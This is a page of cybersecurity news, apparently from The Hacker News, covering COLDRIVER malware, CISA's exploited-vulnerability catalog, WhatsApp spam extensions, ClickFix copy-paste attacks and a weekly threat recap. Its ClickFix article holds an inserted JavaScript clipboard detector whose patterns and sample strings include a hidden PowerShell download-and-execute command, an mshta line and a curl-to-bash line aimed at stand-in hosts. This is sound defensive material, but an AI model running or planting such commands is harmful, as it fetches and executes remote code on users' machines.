Category: Cybersecurity

  • Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers

    Oct 21, 2025 | Ravie Lakshmanan | Cyber Espionage / Threat Intelligence

    A new malware attributed to the Russia-linked hacking group known as COLDRIVER has undergone numerous developmental iterations since May 2025, suggesting an increased “operations tempo” from the threat actor.

    The findings come from Google Threat Intelligence Group (GTIG), which said the state-sponsored hacking crew has rapidly refined and retooled its malware arsenal merely five days following the publication of its LOSTKEYS malware around the same time.

    While it’s currently not known for how long the new malware families have been under development, the tech giant’s threat intelligence team said it has not observed a single instance of LOSTKEYS since disclosure.

    The new malware, codenamed NOROBOT, YESROBOT, and MAYBEROBOT, is “a collection of related malware families connected via a delivery chain,” GTIG researcher Wesley Shields said in a Monday analysis.

    The latest attack waves are something of a departure from COLDRIVER’s typical modus operandi, which involves targeting high-profile individuals in NGOs, policy advisors, and dissidents for credential theft. In contrast, the new activity revolved around leveraging ClickFix-style lures to trick users into running malicious PowerShell commands via the Windows Run dialog as part of a fake CAPTCHA verification prompt.

    While the attacks spotted in January, March, and April 2025 led to the deployment of an information stealing malware known as LOSTKEYS, subsequent intrusions have paved the way for the “ROBOT” family of malware. It’s worth noting that the malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively.

    The new infection chain commences with an HTML ClickFix lure dubbed COLDCOPY that’s designed to drop a DLL called NOROBOT, which is then executed via rundll32.exe to drop the next-stage malware. Initial versions of this attack are said to have distributed a Python backdoor known as YESROBOT, before the threat actors switched to a PowerShell implant named MAYBEROBOT.

    YESROBOT uses HTTPS to retrieve commands from a hard-coded command-and-control (C2) server. A minimal backdoor, it supports the ability to download and execute files, and retrieve documents of interest. Only two instances of YESROBOT deployment have been observed to date, specifically over a two-week period in late May shortly after details of LOSTKEYS became public knowledge.

    In contrast, MAYBEROBOT is assessed to be more flexible and extensible, equipped with features to download and run a payload from a specified URL, run commands using cmd.exe, and run PowerShell code.

    It’s believed that the COLDRIVER actors rushed to deploy YESROBOT as a “stopgap mechanism” likely in response to public disclosure, before abandoning it in favor of MAYBEROBOT, as the earliest version of NOROBOT also included a step to download a full Python 3.8 installation onto the compromised host — a “noisy” artifact that’s bound to raise suspicion.

    Google also pointed out that the use of NOROBOT and MAYBEROBOT is likely reserved for significant targets, who may have been already compromised via phishing, with the end goal of gathering additional intelligence from their devices.

    “NOROBOT and its preceding infection chain have been subject to constant evolution — initially simplified to increase chances of successful deployment, before re-introducing complexity by splitting cryptography keys,” Shields said. “This constant development highlights the group’s efforts to evade detection systems for their delivery mechanism for continued intelligence collection against high-value targets.”

    The disclosure comes as the Netherlands’ Public Prosecution Service, known as the Openbaar Ministerie (OM), announced that three 17-year-old men are suspected of providing services to a foreign government, with one of them alleged to be in contact with a hacker group affiliated with the Russian government.

    “This suspect also gave the other two instructions to map Wi-Fi networks on multiple dates in The Hague,” OM said. “The information collected has been shared with the client by the former suspect for a fee and can be used for digital espionage and cyber attacks.”

    Two of the suspects were apprehended on September 22, 2025, while the third suspect, who was also interviewed by authorities, has been kept under house arrest because of his “limited role” in the case.

    “There are no indications yet that pressure has been exerted on the suspect who was in contact with the hacker group affiliated with the Russian government,” the Dutch government body added.


    Source: thehackernews.com…

  • Five New Exploited Bugs Land in CISA's Catalog — Oracle and Microsoft Among Targets

    Oct 20, 2025 | Ravie Lakshmanan | Threat Intelligence / Data Security

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added five security flaws to its Known Exploited Vulnerabilities (KEV) Catalog, officially confirming a recently disclosed vulnerability impacting Oracle E-Business Suite (EBS) has been weaponized in real-world attacks.

    The security defect in question is CVE-2025-61884 (CVSS score: 7.5), which has been described as a server-side request forgery (SSRF) vulnerability in the Runtime component of Oracle Configurator that could allow attackers unauthorized access to critical data.

    “This vulnerability is remotely exploitable without authentication,” CISA said.

    CVE-2025-61884 is the second flaw in Oracle EBS to be actively exploited along with CVE-2025-61882 (CVSS score: 9.8), a critical bug that could permit unauthenticated attackers to execute arbitrary code on susceptible instances.

    Earlier this month, Google Threat Intelligence Group (GTIG) and Mandiant revealed dozens of organizations may have been impacted following the exploitation of CVE-2025-61882.

    “At this time, we are not able to attribute any specific exploitation activity to a specific actor, but it’s likely that at least some of the exploitation activity we observed was conducted by actors now conducting Cl0p-branded extortion operations,” Zander Work, senior security engineer at GTIG, told The Hacker News last week.

    Also added by CISA to the KEV catalog are four other vulnerabilities –

    • CVE-2025-33073 (CVSS score: 8.8) – An improper access control vulnerability in Microsoft Windows SMB Client that could allow for privilege escalation (Fixed by Microsoft in June 2025)
    • CVE-2025-2746 (CVSS score: 9.8) – An authentication bypass using an alternate path or channel vulnerability in Kentico Xperience CMS that could allow an attacker to control administrative objects by taking advantage of the Staging Sync Server password handling of empty SHA1 usernames in digest authentication (Fixed in Kentico in March 2025)
    • CVE-2025-2747 (CVSS score: 9.8) – An authentication bypass using an alternate path or channel vulnerability in Kentico Xperience CMS that could allow an attacker to control administrative objects by taking advantage of the Staging Sync Server password handling for the server defined None type (Fixed in Kentico in March 2025)
    • CVE-2022-48503 (CVSS score: 8.8) – An improper validation of array index vulnerability in Apple’s JavaScriptCore component that could result in arbitrary code execution when processing web content (Fixed by Apple in July 2022)

    There are currently no details on how the aforementioned four issues are being exploited in the wild, although details about CVE-2025-33073, CVE-2025-2746, and CVE-2025-2747 were shared by researchers from Synacktiv and watchTowr Labs, respectively.

    Federal Civilian Executive Branch (FCEB) agencies are required to remediate identified vulnerabilities by November 10, 2025, to secure their networks against active threats.


    Source: thehackernews.com…

  • 131 Chrome Extensions Caught Hijacking WhatsApp Web for Massive Spam Campaign

    Oct 20, 2025 | Ravie Lakshmanan | Browser Security / Malware

    Cybersecurity researchers have uncovered a coordinated campaign that leveraged 131 rebranded clones of a WhatsApp Web automation extension for Google Chrome to spam Brazilian users at scale.

    The 131 spamware extensions share the same codebase, design patterns, and infrastructure, according to supply chain security company Socket. The browser add-ons collectively have about 20,905 active users.

    “They are not classic malware, but they function as high-risk spam automation that abuses platform rules,” security researcher Kirill Boychenko said. “The code injects directly into the WhatsApp Web page, running alongside WhatsApp’s own scripts, automates bulk outreach and scheduling in ways that aim to bypass WhatsApp’s anti-spam enforcement.”

    The end goal of the campaign is to blast outbound messaging via WhatsApp in a manner that bypasses the messaging platform’s rate limits and anti-spam controls.

    The activity is assessed to have been ongoing for at least nine months, with new uploads and version updates to the extensions observed as recently as October 17, 2025. Some of the identified extensions are listed below –

    • YouSeller (10,000 users)
    • performancemais (239 users)
    • Botflow (38 users)
    • ZapVende (32 users)

    The extensions have been found to embrace different names and logos, but, behind the scenes, the vast majority of them have been published by “WL Extensão” and its variant “WLExtensao.” It’s believed that the differences in branding are the result of a franchise model that allows the operation’s affiliates to flood the Chrome Web Store with various clones of the original extension offered by a company named DBX Tecnologia.

    These add-ons also masquerade as customer relationship management (CRM) tools for WhatsApp, claiming to help users maximize their sales through the web version of the application.

    “Turn your WhatsApp into a powerful sales and contact management tool. With Zap Vende, you’ll have an intuitive CRM, message automation, bulk messaging, visual sales funnel, and much more,” reads the description of ZapVende on the Chrome Web Store. “Organize your customer service, track leads, and schedule messages in a practical and efficient way.”

    DBX Tecnologia, per Socket, advertises a reseller white-label program to allow prospective partners to rebrand and sell its WhatsApp Web extension under their own brand, promising recurring revenue in the range of R$30,000 to R$84,000 by investing R$12,000.

    It’s worth noting that the practice is in violation of Google’s Chrome Web Store Spam and Abuse policy, which bans developers and their affiliates from submitting multiple extensions that provide duplicate functionality on the platform. DBX Tecnologia has also been found to have put out YouTube videos about bypassing WhatsApp’s anti-spam algorithms when using the extensions.

    “The cluster consists of near-identical copies spread across publisher accounts, is marketed for bulk unsolicited outreach, and automates message sending inside web.whatsapp.com without user confirmation,” Boychenko noted. “The goal is to keep bulk campaigns running while evading anti-spam systems.”

    The disclosure comes as Trend Micro, Sophos, and Kaspersky shed light on a large-scale campaign that’s targeting Brazilian users with a WhatsApp worm dubbed SORVEPOTEL that’s used to distribute a banking trojan codenamed Maverick.


    Source: thehackernews.com…

  • Analysing ClickFix: 3 Reasons Why Copy/Paste Attacks Are Driving Security Breaches

    ClickFix, FileFix, fake CAPTCHA — whatever you call it, attacks where users interact with malicious scripts in their web browser are a fast-growing source of security breaches.

    ClickFix attacks prompt the user to solve some kind of problem or challenge in the browser — most commonly a CAPTCHA, but also things like fixing an error on a webpage.

    The name is a little misleading, though — the key factor in the attack is that it tricks users into running malicious commands on their device by copying malicious code from the page to the clipboard and running it locally.

    Examples of ClickFix lures used by attackers in the wild.

    ClickFix is known to be regularly used by the Interlock ransomware group and other prolific threat actors, including state-sponsored APTs. A number of recent public data breaches have been linked to ClickFix-style TTPs, such as Kettering Health, DaVita, City of St. Paul, Minnesota, and the Texas Tech University Health Sciences Centers (with many more breaches likely to involve ClickFix where the attack vector wasn’t known or disclosed).

    But why are these attacks proving to be so effective?

    Reason 1: Users aren’t ready for ClickFix

    For the past decade or more, user awareness has focused on stopping users from clicking links in suspicious emails, downloading risky files, and entering their username and password into random websites. It hasn’t focused on opening up a program and running a command.

    Suspicion is further reduced when you consider that the malicious clipboard copy action is performed behind the scenes via JavaScript 99% of the time.

    Example of unobfuscated JavaScript code performing the copy function automatically on a ClickFix page without user input.

    And with modern ClickFix sites and lures becoming increasingly legitimate-looking (see the example below), it’s not surprising that users are falling victim.

    One of the more legit-looking ClickFix lures — this one even has an embedded video showing the user what to do!

    When you consider the fact that these attacks are moving away from email altogether, it doesn’t fit the model of what users are trained to be suspicious of.

    The top delivery vector identified by Push Security researchers was found to be SEO poisoning & malvertising via Google Search. By creating new domains or taking over legitimate ones, attackers are creating watering hole scenarios to intercept users browsing the internet.

    And even if you were suspicious, there’s no convenient “report phishing” button or workflow to notify your security team for Google Search results, social media messages, website ads, and so on.

    Reason 2: ClickFix isn’t being detected during delivery

    There are a few aspects of why ClickFix attacks are going undetected by technical controls.

    ClickFix pages, like other modern phishing sites, are using a range of detection evasion techniques that prevent them from being flagged by security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic. Detection evasion mainly involves camouflaging and rotating domains to stay ahead of known-bad detections (i.e., blocklists), using bot protection to prevent analysis, and heavily obfuscating page content to stop detection signatures from firing.

    And by using non-email delivery vectors, an entire layer of detection opportunity is cut out.

    Like other modern phishing attacks, ClickFix lures are distributed all over the internet — not just email.

    Malvertising adds another layer of targeting to the picture. For example, Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target is located, you can tailor the ad parameters accordingly.

    Along with other techniques, like conditional loading to return a lure appropriate for your operating system (or not triggering at all unless certain conditions are met, e.g. you’re visiting from a mobile OS, or from outside a target IP range) attackers have a way of reaching a large number of potential victims while avoiding security controls at the email layer and preventing unwanted analysis.

    Example of a ClickFix lure built onto a vibe-coded site.

    Finally, because the code is copied inside the browser sandbox, typical security tools are unable to observe and flag this action as potentially malicious. This means that the last — and only — opportunity for organizations to stop ClickFix is on the endpoint, after the user has attempted to run the malicious code.

    Reason 3: EDR is the last and only line of defense — and it’s not foolproof

    There are multiple stages to the attack that can and should be intercepted by EDR, but the level of detection raised, and whether an action is blocked in real time, is driven by context.

    Because there’s no file download from the web, and the act of running code on the machine is initiated by the user, there’s no context tying the action to another application to make it appear suspicious. For example, malicious PowerShell executed from Outlook or Chrome would appear obviously suspicious, but because it’s user-initiated, it’s isolated from the context of where the code was delivered.

    The malicious commands themselves might be obfuscated or broken into stages to avoid easy detection by heuristic rules. EDR telemetry might record that a PowerShell process ran, but without a known bad signature or a clear policy violation, it may not flag it immediately.

    The final stage at which the attack should be intercepted by any reputable EDR is at the point of malware execution. But detection evasion is a cat-and-mouse game, and attackers are always looking for ways to tweak their malware to evade or disable detection tools. So, exceptions do happen.

    And if you’re an organization that allows employees and contractors to use unmanaged BYOD devices, there’s a strong chance that there are gaps in your EDR coverage.

    Ultimately, organizations are leaving themselves relying on a single line of defense — if the attack isn’t detected and blocked by EDR, it isn’t spotted at all.

    Why the standard recommendations are falling short

    Most of the vendor-agnostic recommendations have focused on restricting access to services like the Windows Run dialog box for typical users. But although mshta and PowerShell remain the most commonly observed, security researchers have already spotted a wide range of LOLBINS targeting different services, many of which are difficult to prevent users from accessing.

    It’s also worth considering how ClickFix-style attacks may continue to evolve in the future. The current attack path straddles browser and endpoint — what if it could take place entirely in the browser and evade EDR altogether? For example, by pasting malicious JavaScript directly into the devtools on a relevant webpage.

    The current hybrid attack path sees the attacker deliver lures in the browser, to compromise the endpoint, to get access to creds and cookies stored in the browser. What if you could skip the endpoint altogether?

    Stopping ClickFix on the front line — in the browser

    Push Security’s latest feature, malicious copy and paste detection, tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking. This is a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.

    Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity.
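As an added illustration of the browser-side detection this section describes (example code written for this page, not Push Security’s product code), the snippet below classifies text at the moment it is copied and flags ClickFix-style payloads while leaving ordinary copies alone. The rules, the constructed sample strings and the way the monitor is wired into a page are assumptions; intercepting `navigator.clipboard.writeText` only takes effect when the script runs in the page’s own JavaScript world rather than an extension’s isolated world.

```javascript
// Added example (not Push Security's code): a minimal browser-side detector for
// ClickFix-style clipboard payloads. Rules and samples are constructed for this
// illustration; how a real extension would inject this is an assumption.

// Each rule is a regex plus a category. A copied string that hits at least two
// different categories (or a fetch-and-execute pair) is flagged, which keeps a
// lone URL or a single command name from tripping the detector.
const RULES = [
  // "lolbin": Windows binaries commonly named in ClickFix commands.
  { cat: 'lolbin', re: /\b(powershell|pwsh|mshta|rundll32|regsvr32|cmd|wscript|cscript|certutil|bitsadmin)(\.exe)?\b/i },
  // "fetch": the command pulls something from the network.
  { cat: 'fetch', re: /\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b|https?:\/\//i },
  // "exec": what was fetched is executed in place.
  { cat: 'exec', re: /\b(iex|invoke-expression|start-process)\b|\|\s*(sh|bash)\b/i },
  // "stealth": flags that hide the window, skip policy checks or encode the command.
  { cat: 'stealth', re: /(^|\s)-(w|windowstyle)\s+hidden\b|(^|\s)-(ep|executionpolicy)\s+bypass\b|(^|\s)-(nop|noprofile|noninteractive)\b|(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}/i },
  // "lure": a trailing comment that mimics a verification string so the pasted
  // line looks like a CAPTCHA token to the user.
  { cat: 'lure', re: /(#|::|\brem\s).*\b(robot|captcha|verif|human)/i },
];

// Returns { suspicious, categories } for one clipboard string.
function classifyClipboardText(text) {
  const matched = new Set();
  for (const { cat, re } of RULES) {
    if (re.test(text)) matched.add(cat);
  }
  const categories = [...matched].sort();
  const suspicious =
    (matched.has('lolbin') && categories.length >= 2) ||
    (matched.has('fetch') && matched.has('exec'));
  return { suspicious, categories };
}

// Constructed samples: two ClickFix-shaped strings and two benign copies.
// Note that a "curl ... | bash" installer is flagged on purpose: the detector
// cannot tell a trusted install one-liner from a lure, so it reports and lets
// policy decide.
const SAMPLES = {
  clickfix: 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/x)" # I am not a robot',
  mshta: 'mshta https://example.invalid/verify.hta',
  installer: 'curl -fsSL https://example.invalid/install.sh | bash',
  docsUrl: 'https://example.invalid/docs/getting-started',
  bareCmd: 'cmd',
};

// Runs every sample through the classifier; handy for a quick self-check.
function scanSamples() {
  const out = {};
  for (const [name, text] of Object.entries(SAMPLES)) out[name] = classifyClipboardText(text);
  return out;
}

// Browser wiring (skipped under Node). The bubbling 'copy' listener on window runs
// after the page's own handlers, so it sees what they placed on the clipboard via
// setData; a page that calls stopPropagation can hide that, which is why the
// navigator.clipboard.writeText path is wrapped as well (main world only).
function installClipboardMonitor(onVerdict) {
  if (typeof window === 'undefined' || typeof document === 'undefined') return false;
  window.addEventListener('copy', (ev) => {
    const fromEvent = ev.clipboardData ? ev.clipboardData.getData('text/plain') : '';
    const text = fromEvent || String(document.getSelection() || '');
    onVerdict(classifyClipboardText(text), text, 'copy-event');
  }, false);
  if (typeof navigator !== 'undefined' && navigator.clipboard && navigator.clipboard.writeText) {
    const original = navigator.clipboard.writeText.bind(navigator.clipboard);
    navigator.clipboard.writeText = (text) => {
      onVerdict(classifyClipboardText(String(text)), String(text), 'clipboard-api');
      return original(text);
    };
  }
  return true;
}

installClipboardMonitor((verdict, text, source) => {
  if (verdict.suspicious) console.warn('ClickFix-style clipboard content', source, verdict.categories, text);
});
```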

    Learn more

    If you want to learn more about ClickFix attacks and how they’re evolving, check out this upcoming webinar where Push Security researchers will be diving into real-world ClickFix examples and demonstrating how ClickFix sites work under the hood.

    Push Security’s browser-based security platform provides comprehensive attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more, to harden your identity attack surface.

    To learn more about Push, check out our latest product overview or book some time with one of our team for a live demo.


    Source: thehackernews.com…

  • ⚡ Weekly Recap: F5 Breached, Linux Rootkits, Pixnapping Attack, EtherHiding & More

    It’s easy to think your defenses are solid — until you realize attackers have been inside them the whole time. The latest incidents show that long-term, silent breaches are becoming the norm. The best defense now isn’t just patching fast, but watching smarter and staying alert for what you don’t expect.

    Here’s a quick look at this week’s top threats, new tactics, and security stories shaping the landscape.

    ⚡ Threat of the Week

    F5 Exposed to Nation-State Breach — F5 disclosed that unidentified threat actors broke into its systems and stole files containing some of BIG-IP’s source code and information related to undisclosed vulnerabilities in the product. The company said it learned of the incident on August 9, 2025, although it’s believed that the attackers were in its network for at least 12 months. The attackers are said to have used a malware family called BRICKSTORM, which is attributed to a China-nexus espionage group dubbed UNC5221. GreyNoise said it observed elevated scanning activity targeting BIG-IP in three waves on September 23, October 14, and October 15, 2025, but emphasized the anomalies may not necessarily relate to the hack. Censys said it identified over 680,000 F5 BIG-IP load balancers and application gateways visible on the public internet, with the majority of hosts located in the U.S., followed by Germany, France, Japan, and China. Not all identified systems are necessarily vulnerable, but each represents a publicly accessible interface that should be inventoried, access-restricted, and patched proactively as a precautionary measure. “Edge infrastructure and security vendors remain prime targets for long-term, often state-linked threat actors,” John Fokker, vice president of threat intelligence strategy at Trellix, said. “Over the years, we have seen nation-state interest in exploiting vulnerabilities in edge devices, recognizing their strategic position in global networks. Incidents like these remind us that strengthening collective resilience requires not only hardened technology but also open collaboration and intelligence sharing across the security community.”

    🔔 Top News

    • N. Korea Uses EtherHiding to Hide Malware Inside Blockchain Smart Contracts — North Korean threat actors have been observed leveraging the EtherHiding technique to distribute malware and enable cryptocurrency theft, marking the first time a state-sponsored hacking group has embraced the method. The activity has been attributed to a cluster tracked as UNC5342 (aka Famous Chollima). The attack wave is part of a long-running campaign codenamed Contagious Interview, wherein the attackers approach potential targets on LinkedIn by posing as recruiters or hiring managers, and trick them into running malicious code under the pretext of a job assessment after shifting the conversation to Telegram or Discord. In the latest attack waves observed since February 2025, the threat actors use a JavaScript downloader that interacts with a malicious BSC smart contract to download JADESNOW, which subsequently queries the transaction history associated with an Ethereum address to fetch the JavaScript version of InvisibleFerret.
    • LinkPro Linux Rootkit Spotted in the Wild — An investigation into the compromise of an Amazon Web Services (AWS)-hosted infrastructure led to the discovery of a new GNU/Linux rootkit dubbed LinkPro. The backdoor features functionalities relying on the installation of two extended Berkeley Packet Filter (eBPF) modules to conceal itself and to be remotely activated upon receiving a magic packet – a TCP SYN packet with a specific window size (54321) that signals the rootkit to await further instructions within a one-hour window, allowing it to evade traditional security defenses. The commands supported by LinkPro include executing /bin/bash in a pseudo-terminal, running a shell command, enumerating files and directories, performing file operations, downloading files, and setting up a SOCKS5 proxy tunnel. It’s currently not known who is behind the attack, but it’s suspected that the threat actors are financially motivated.
    • Zero Disco Campaign Targets Cisco Devices with Rootkits — A new campaign has exploited a recently disclosed security flaw impacting Cisco IOS Software and IOS XE Software to deploy Linux rootkits on older, unprotected systems. The activity, codenamed Operation Zero Disco by Trend Micro, involves the weaponization of CVE-2025-20352 (CVSS score: 7.7), a stack overflow vulnerability in the Simple Network Management Protocol (SNMP) subsystem that could allow an authenticated, remote attacker to execute arbitrary code by sending crafted SNMP packets to a susceptible device. The operation primarily impacted Cisco 9400, 9300, and legacy 3750G series devices, Trend Micro said. The intrusions have not been attributed to any known threat actor or group.
    • Pixnapping Attack Leads to Data Theft on Android Devices — Android devices from Google and Samsung have been found vulnerable to a side-channel attack that could be exploited to covertly steal two-factor authentication (2FA) codes, Google Maps timelines, and other sensitive data without the users’ knowledge pixel-by-pixel. The attack has been codenamed Pixnapping. Google is tracking the issue under the CVE identifier CVE-2025-48561 (CVSS score: 5.5). Patches for the vulnerability were issued by the tech giant as part of its September 2025 Android Security Bulletin, with additional fixes forthcoming in December.
    • Chinese Threat Actors Exploited ArcGIS Server as Backdoor — Threat actors with ties to China have been attributed to a novel campaign that compromised an ArcGIS system and turned it into a backdoor for more than a year. The activity is the handiwork of a Chinese state-sponsored hacking group called Flax Typhoon, which is also tracked as Ethereal Panda and RedJuliett. “The group cleverly modified a geo-mapping application’s Java server object extension (SOE) into a functioning web shell,” ReliaQuest said. “By gating access with a hardcoded key for exclusive control and embedding it in system backups, they achieved deep, long-term persistence that could survive a full system recovery.” The attack chain involved the threat actors targeting a public-facing ArcGIS server that was linked to a private, internal ArcGIS server by compromising a portal administrator account to deploy a malicious SOE, thereby allowing them to blend in with normal traffic and maintain access for extended periods. The attackers then instructed the public-facing server to create a hidden directory to serve as the group’s “private workspace.” They also blocked access to other attackers and admins with a hard-coded key. The findings demonstrate Flax Typhoon’s consistent modus operandi of quietly turning an organization’s own tools against itself rather than using sophisticated malware or exploits.

    🔥 Trending CVEs

    Hackers move fast. They often exploit new vulnerabilities within hours, turning a single missed patch into a major breach. One unpatched CVE can be all it takes for a full compromise. Below are this week’s most critical vulnerabilities gaining attention across the industry. Review them, prioritize your fixes, and close the gap before attackers take advantage.

    This week’s list includes — CVE-2025-24990, CVE-2025-59230 (Microsoft Windows), CVE-2025-47827 (IGEL OS before 11), CVE-2023-42770, CVE-2023-40151 (Red Lion Sixnet RTUs), CVE-2025-2611 (ICTBroadcast), CVE-2025-55315 (Microsoft ASP.NET Core), CVE-2025-11577 (Clevo UEFI firmware), CVE-2025-37729 (Elastic Cloud Enterprise), CVE-2025-9713, CVE-2025-11622 (Ivanti Endpoint Manager), CVE-2025-48983, CVE-2025-48984 (Veeam), CVE-2025-11756 (Google Chrome), CVE-2025-49201 (Fortinet FortiPAM and FortiSwitch Manager), CVE-2025-58325 (Fortinet FortiOS CLI), CVE-2025-49553 (Adobe Connect collaboration suite), CVE-2025-9217 (Slider Revolution plugin), CVE-2025-10230 (Samba), CVE-2025-54539 (Apache ActiveMQ), CVE-2025-41703, CVE-2025-41704, CVE-2025-41706, CVE-2025-41707 (Phoenix Contact QUINT4), and CVE-2025-11492, CVE-2025-11493 (ConnectWise Automate).

    📰 Around the Cyber World

    • Microsoft Unveils New Security Improvements — Microsoft revealed that “parts of the kernel in Windows 11 have been rewritten in Rust, which helps mitigate against memory corruption vulnerabilities like buffer overflows and helps reduce attack surfaces.” The company also noted that it’s taking steps to secure AI-powered agentic experiences on the operating system by ensuring that they operate with limited permissions and only obtain access to resources users explicitly grant them permission to use. In addition, Microsoft said agents that integrate with Windows must be cryptographically signed by a trusted source so that they can be revoked if found to be malicious. Each AI agent will also run under its own dedicated agent account that’s distinct from the user account on the device. “This facilitates agent-specific policy application that can be different from the rules applied to other accounts like those for human users,” it said.
    • SEO Campaign Uses Fake Ivanti Installers to Steal Credentials — A new attack campaign has leveraged SEO poisoning to lure users into downloading a malicious version of the Ivanti Pulse Secure VPN client. The activity targets users searching for legitimate software on search engines like Bing, redirecting them to attacker-controlled lookalike websites (ivanti-pulsesecure[.]com or ivanti-secure-access[.]org). The goal of this attack is to steal VPN credentials from the victim’s machine, enabling further compromise. “The malicious installer, a signed MSI file, contains a credential-stealing DLL designed to locate, parse, and exfiltrate VPN connection details,” Zscaler said. “The malware specifically targets the connectionstore.dat file to steal saved VPN server URIs, which it combines with hardcoded credentials for exfiltration. Data is sent to a command-and-control (C2) server hosted on Microsoft Azure infrastructure.”
    • Qilin’s Ties with BPH Providers Exposed — Cybersecurity researchers from Resecurity examined Qilin ransomware group’s “close affiliation” with underground bulletproof hosting (BPH) operators, finding that the e-crime actor has not only relied on Cat Technologies Co. Limited (which, in turn, is hosted on an IP address tied to Aeza Group) for hosting its data leak site, but also advertised services like BEARHOST Servers (aka Underground) on its WikiLeaksV2 site, where the group publishes content about their activities. BEARHOST has been operational since 2016, offering its services for anywhere from $95 to $500. While BEARHOST abruptly announced the stoppage of its service on December 28, 2024, it is assessed that the threat actors have taken the BPH service into private mode, catering only to trusted and vetted underground actors. On May 8, 2025, it resurfaced as Voodoo Servers, only for the operators to terminate the service again towards the end of the month, citing political reasons. “The actors decided to disappear through an ‘exit scam’ scenario, keeping the underground audience completely clueless,” Resecurity said. “Notably, the legal entities behind the service continue their operations.” Cat Technologies Co. Limited also shares links to shadowy entities like Red Bytes LLC, Hostway, Starcrecium Limited, and Chang Way Technologies Co. Limited, the last of which has been associated with extensive malware activity, hosting command-and-control (C2) servers of Amadey, StealC, and Cobalt Strike used by cybercriminals. Another entity of note is Next Limited, which shares the same Hong Kong address as Chang Way Technologies Co. Limited and has been attributed to malicious activity in connection with Proton66.
    • U.S. Judge Bars NSO Group from Targeting WhatsApp — A U.S. judge barred NSO Group from targeting WhatsApp users and cut the punitive damages verdict awarded to Meta by a jury in May 2025 to $4 million, because the court did not have enough evidence to determine that NSO Group’s behavior was “particularly egregious.” The permanent injunction handed out by U.S. District Judge Phyllis Hamilton means that the Israeli vendor cannot use WhatsApp as a way to infect targets’ devices. As a refresher, Meta sued the NSO Group in 2019 over the use of Pegasus spyware by exploiting a then-zero-day flaw in the messaging app to spy on 1,400 people from 20 countries, including journalists and human rights activists. It was fined close to $168 million earlier this May. The proposed injunction requires NSO Group to delete and destroy computer code related to Meta’s platforms, and she concluded that the provision is “necessary to prevent future violations, especially given the undetectable nature of defendants’ technology.”
    • Google’s Privacy Sandbox Initiative is Officially Dead — In 2019, Google launched an initiative called Privacy Sandbox to come up with privacy-enhancing alternatives to replace third-party cookies on the web. However, with the company abandoning its plans to deprecate third-party tracking cookies, the project appears to be winding down. To that end, the tech giant said it’s retiring the following Privacy Sandbox technologies citing low levels of adoption: Attribution Reporting API (Chrome and Android), IP Protection, On-Device Personalization, Private Aggregation (including Shared Storage), Protected Audience (Chrome and Android), Protected App Signals, Related Website Sets (including requestStorageAccessFor and Related Website Partition), SelectURL, SDK Runtime and Topics (Chrome and Android). In a statement shared with Adweek, the company said it will continue to work to improve privacy across Chrome, Android, and the web, but not under the Privacy Sandbox branding.
    • Russia Blocks Foreign SIM Cards — Russia said it’s taking steps to temporarily block mobile internet for foreign SIM cards, citing national security reasons. The new rule imposes a mandatory 24-hour mobile internet blackout for anyone entering Russia with a foreign SIM card.
    • Flaw in CORS Headers in Web Browsers Disclosed — The CERT Coordination Center (CERT/CC) disclosed details of a vulnerability in cross-origin resource sharing (CORS) headers in Chromium, Google Chrome, Microsoft Edge, Safari, and Firefox that enables the CORS policy to be manipulated. This can be combined with DNS rebinding techniques to issue arbitrary requests to services listening on arbitrary ports, regardless of the CORS policy put in place by the target. “An attacker can use a malicious site to execute a JavaScript payload that periodically sends CORS headers in order to ask the server if the cross-origin request is safe and allowed,” CERT/CC explained. “Naturally, the attacker-controlled hostname will respond with permissive CORS headers that will circumvent the CORS policy. The attacker then performs a DNS rebinding attack so that the hostname is assigned the IP address of the target service. After the DNS responds with the changed IP address, the new target inherits the relaxed CORS policy, allowing an attacker to potentially exfiltrate data from the target.” Mozilla is tracking the vulnerability as CVE-2025-8036.
    • Phishing Campaigns Use Microsoft’s Logo for Tech Support Scams — Threat actors are exploiting Microsoft’s name and branding in phishing emails to lure users into fraudulent tech support scams. The messages contain links that, when clicked, take the victims to a fake CAPTCHA challenge, after which they are redirected to a phishing landing page to unleash the next stage of the attack. “After passing the captcha verification, the victim is suddenly visually overloaded with several pop-ups that appear to be Microsoft security alerts,” Cofense said. “Their browser is manipulated to appear locked, and they lose the ability to locate or control their mouse, which adds to the feeling that the system is compromised. This involuntary loss of control creates a faux ransomware experience, leading the user to believe their computer is locked and to take immediate action to remedy the infection.” From there, users are instructed to call a number to reach Windows Support, at which point they are connected to a bogus technician who takes the attack forward. “The threat actor could exploit further by asking the user to provide account credentials or persuade the user to install remote desktop tools, allowing full access to their system,” the company said.
    • Taxpayers, Drivers Targeted in Refund and Road Toll Smishing Scams — A smishing campaign has leveraged at least 850 newly-registered domain names in September and early October to target people living in the U.S., the U.K., and elsewhere with phishing links that use tax refunds, road toll charges, or failed package deliveries as a lure. The websites, designed to load only when launched from a mobile device, claim to provide information about visitors’ tax refund status or a subsidy of up to £300 to help offset winter fuel costs (note: this is a real U.K. government initiative), only to prompt them to provide personal details such as name, home address, telephone number and email address, as well as payment card information. The entered data is exfiltrated to the attackers over the WebSocket protocol. Some of the scam websites have also been found to target Canadian, German, and Spanish residents and visitors, per Netcraft.
